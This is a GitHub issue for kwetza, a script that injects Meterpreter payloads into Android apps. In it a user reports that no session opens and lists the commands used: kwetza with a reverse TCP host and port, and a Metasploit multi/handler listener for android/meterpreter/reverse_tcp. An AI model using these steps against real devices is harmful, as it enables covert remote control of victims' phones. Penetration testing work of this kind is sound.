sensepost / kwetza

Python script to inject existing Android applications with a Meterpreter payload.
GNU General Public License v2.0
629 stars 238 forks source link

No Error but not happening! #39

Open StephanRq1 opened 5 years ago

StephanRq1 commented 5 years ago

I use this usage: python kwetza.py myapk.apk tcp 192.168.1.13 4444 yes AssistActivity and then kwetza work and generate an apk in dist folder. after that i create a meterpereter in msfconsole : use multi/handler set payload android/meterpereter/reverse_tcp set LHOST 192.168.1.13 set LPORT 4444 run

i install that apk in my android phone and not happening in msfconsole and meterpereter session not opened! Exactly like this video : https://www.youtube.com/watch?v=yw-nQpVU6Zk and not happening after install apk